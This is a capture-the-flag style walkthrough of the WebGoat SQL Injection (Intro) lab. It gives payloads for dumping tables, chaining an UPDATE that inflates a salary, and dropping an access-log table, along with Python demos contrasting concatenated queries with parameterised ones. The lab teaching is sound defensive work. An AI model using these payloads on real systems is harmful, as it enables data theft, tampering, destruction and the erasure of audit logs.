In this walkthrough, we will go through the SQL Injection (Intro) section of the WebGoat labs. We will explore and exploit basic SQL injection and learn how applications are affected by it. So, let's get started with the hacking without any delay.
1. What is SQL?
Structured Query Language (SQL) is a domain-specific language used to manage data, especially in a relational database management system (RDBMS). In this challenge, we will use the query below to look up the department of a particular userId in the database.
SELECT department FROM employees WHERE userId=96134
2. Data Manipulation Language (DML)
Data Manipulation Language (DML) is the part of SQL used for adding (INSERT), deleting (DELETE), and modifying (UPDATE) the data held in a database.
We will use the UPDATE statement below to change the department of a particular userId.
UPDATE employees SET department = 'Sales' WHERE userID = 89762;
3. Data Definition Language (DDL)
In the context of SQL, Data Definition Language (DDL) is the syntax for creating and modifying database objects such as tables, indices, and users; in other words, it defines the database schema rather than the rows inside it. In this challenge, we will use the ALTER statement below to add a column "phone" to the "employees" table.
ALTER TABLE employees ADD phone varchar(20);
4. Data Control Language (DCL)
Data Control Language (DCL) consists of statements that control access rights and concurrent access to table data. In this challenge, we will grant all rights on the table grant_rights to the user unauthorized_user using the GRANT statement below.
GRANT ALL ON grant_rights TO unauthorized_user;
5. String Injection
A string SQL injection happens when user input is concatenated into a query inside a string literal. By putting a single quote in the input, the attacker closes that literal early and whatever follows is parsed as SQL, which lets them read, modify or destroy data in the database through the vulnerable application or API.
In this challenge, we will use the select boxes to build a query that breaks out of the string literal and dumps all the data in the table.
6. Numeric SQL injection
In this challenge, we will exploit a numeric SQL injection. Here the input is used in a numeric context without surrounding quotes, so there is no quote to close and the condition can be appended directly, which makes it easier to exploit.
We will use the payload below to dump all the data from the table. Because the WHERE clause becomes "userId=0 OR 1=1", the condition is true for every row.
0 OR 1=1
7. Compromising confidentiality with String SQL injection
In this challenge, we will use a string SQL injection to compromise the confidentiality of the data by dumping every row of the table. The single quote after Smith closes the string literal, and the OR 1=1 that follows makes the condition true for every row. Depending on where the injection point sits, the rest of the original query may need to be balanced (for example by ending the payload with ' OR '1'='1) or commented out so the statement still parses.
Smith' OR 1=1
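To see both the numeric and the string variant against a real database, here is an added example that is not part of the original walkthrough or of WebGoat's own code. It builds a constructed in-memory SQLite table (the column names userId, last_name, department, auth_tan and salary are assumptions modelled on the walkthrough's queries), runs the two payloads through functions that concatenate input into the query text, and then runs the same payloads through parameterised versions. The string payload uses the quote-balanced form Smith' OR '1'='1 so the statement parses in SQLite.

```python
import sqlite3

# Constructed sample data standing in for WebGoat's "employees" table
# (assumption: column names and values are made up for this example).
EMPLOYEES = [
    (96134, "John", "Smith", "Engineering", "3SL99A", 50000),
    (89762, "Jane", "Doe", "Sales", "TA9LL1", 65000),
    (34477, "Ann", "Lee", "Finance", "8AWBS7", 70000),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employees (userId INTEGER, first_name TEXT, last_name TEXT, "
        "department TEXT, auth_tan TEXT, salary INTEGER)"
    )
    conn.executemany("INSERT INTO employees VALUES (?, ?, ?, ?, ?, ?)", EMPLOYEES)
    return conn


# --- Vulnerable: the input is pasted straight into the SQL text ---

def department_vulnerable(conn, user_id: str):
    # Numeric context: no quotes around the value, so "0 OR 1=1" becomes
    # part of the WHERE clause and matches every row.
    sql = "SELECT department FROM employees WHERE userId=" + user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_vulnerable(conn, last_name: str):
    # String context: the input sits inside single quotes; a quote in the
    # input closes the literal and the rest is parsed as SQL.
    sql = ("SELECT userId, last_name, auth_tan FROM employees "
           "WHERE last_name = '" + last_name + "'")
    return conn.execute(sql).fetchall()


# --- Hardened: placeholders; the value never becomes part of the query text ---

def department_safe(conn, user_id: str):
    try:
        uid = int(user_id)  # enforce the expected type before it reaches the database
    except ValueError:
        return []
    return [row[0] for row in
            conn.execute("SELECT department FROM employees WHERE userId=?", (uid,))]


def lookup_safe(conn, last_name: str):
    # The payload is compared as a literal last name, so nothing matches.
    return conn.execute(
        "SELECT userId, last_name, auth_tan FROM employees WHERE last_name = ?",
        (last_name,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(department_vulnerable(db, "96134"))          # ['Engineering']
    print(department_vulnerable(db, "0 OR 1=1"))       # every department
    print(lookup_vulnerable(db, "Smith' OR '1'='1"))   # every row, TANs included
    print(department_safe(db, "0 OR 1=1"))             # []
    print(lookup_safe(db, "Smith' OR '1'='1"))         # []
```

The hardened lookups do not strip or escape the quote; they simply never let the input become SQL, which is why the same payload returns nothing.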
8. Compromising integrity with Query chaining
In this challenge, we will compromise the integrity of the data with query chaining (also called stacked queries), which works when the backend executes every semicolon-separated statement it receives in one call.
We will use the payload below. The single quote and semicolon end the original SELECT at the employee name field, the UPDATE statement then sets the salary of the employee with a particular authentication TAN to the number we want, and the trailing "-- -" comments out whatever remains of the original query so it still parses.
Smith'; UPDATE employees SET salary=10000000 WHERE auth_tan='3SL99A'; -- -
9. Compromising Availability
In this challenge, we will compromise the availability of the data using SQL injection. This will be done by deleting the access_log table, which holds the log entries that record our malicious queries.
We will use the payload below to drop the access_log table. It chains a DROP TABLE onto the original query in the same way as the previous challenge; if the injected text is followed by the closing quote of the original statement, appending a comment such as "-- -" (as in the previous payload) keeps the dangling quote from causing a syntax error.
Smith'; DROP TABLE access_log;
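The following added example (not part of the original walkthrough or of WebGoat's own code) reproduces the query-chaining payloads from this challenge and the previous one against a constructed SQLite database. Python's sqlite3 driver refuses to run more than one statement per execute() call, so the example includes a small run_stacked() helper that stands in for a backend (like the one behind WebGoat) that accepts stacked statements; it splits the text with sqlite3.complete_statement(), which follows SQL's own lexing rules and therefore ignores semicolons inside string literals and comments. The table layout, column names and the TAN values are assumptions, and both payloads end with "-- -" so the trailing part of the original query is commented out.

```python
import sqlite3

# Constructed sample data (assumption: the schema, names and TANs are made up
# for this example and only mirror the walkthrough's payloads).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE employees (last_name TEXT, auth_tan TEXT, salary INTEGER);
        INSERT INTO employees VALUES ('Smith', '3SL99A', 50000);
        INSERT INTO employees VALUES ('Doe',   'TA9LL1', 65000);
        CREATE TABLE access_log (id INTEGER, action TEXT);
        INSERT INTO access_log VALUES (1, 'lookup Smith');
    """)
    return conn


def run_stacked(conn, sql: str):
    """Stand-in for a driver that executes every ';'-separated statement it
    receives in one call. Returns the rows of the last statement that
    produced a result set. Text left over after the last complete statement
    (for example everything swallowed by a trailing '-- -' comment) is never
    a full statement and is simply dropped."""
    rows, buf = [], ""
    for ch in sql + ";":
        buf += ch
        if ch == ";" and sqlite3.complete_statement(buf):
            if buf.strip(" ;\n\t"):
                cur = conn.execute(buf)
                if cur.description is not None:   # only SELECTs have a description
                    rows = cur.fetchall()
            buf = ""
    return rows


# --- Vulnerable: input concatenated into the query and run through a stacking backend ---

def lookup_vulnerable(conn, name: str, tan: str):
    sql = ("SELECT last_name, salary FROM employees WHERE last_name = '" + name
           + "' AND auth_tan = '" + tan + "'")
    return run_stacked(conn, sql)


# --- Hardened: one parameterised statement; the payload is just a string value ---

def lookup_safe(conn, name: str, tan: str):
    return conn.execute(
        "SELECT last_name, salary FROM employees WHERE last_name = ? AND auth_tan = ?",
        (name, tan),
    ).fetchall()


def driver_rejects_stacking(conn) -> bool:
    """True if execute() refuses two statements in one call (sqlite3 raises
    ProgrammingError; older Python versions raised sqlite3.Warning)."""
    try:
        conn.execute("SELECT 1; SELECT 2")
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return True
    return False


# Helpers used to observe the side effects of the payloads.
def salary_of(conn, tan: str):
    row = conn.execute("SELECT salary FROM employees WHERE auth_tan = ?", (tan,)).fetchone()
    return row[0] if row else None


def table_exists(conn, name: str) -> bool:
    return conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone() is not None


INTEGRITY_PAYLOAD = "Smith'; UPDATE employees SET salary=10000000 WHERE auth_tan='3SL99A'; -- -"
AVAILABILITY_PAYLOAD = "Smith'; DROP TABLE access_log; -- -"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "Smith", "3SL99A"))       # legitimate use: [('Smith', 50000)]
    lookup_vulnerable(db, INTEGRITY_PAYLOAD, "anything")
    print(salary_of(db, "3SL99A"))                         # 10000000
    lookup_vulnerable(db, AVAILABILITY_PAYLOAD, "anything")
    print(table_exists(db, "access_log"))                  # False
    clean = make_db()
    print(lookup_safe(clean, INTEGRITY_PAYLOAD, "anything"))  # []
    print(salary_of(clean, "3SL99A"))                      # 50000
```

Two things to take from this: the SELECT in the chained payload still returns Smith's old salary because it runs before the UPDATE, so the attacker sees nothing unusual in the response; and a driver that executes exactly one parameterised statement per call (as driver_rejects_stacking shows for sqlite3) closes the chaining vector even before the parameters are considered.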
Conclusion:
So, we have finally completed the WebGoat SQL Injection (Intro) section. These attacks are mitigated by using prepared statements or parameterized queries for every SQL query the application sends to the database, so that user input is never part of the query text; input validation and least-privilege database accounts are worthwhile additional layers, but they are not a substitute for parameterization. On that note, I will take my leave and will meet you in the next one with another WebGoat vulnerability writeup. Till then, "Keep Hacking".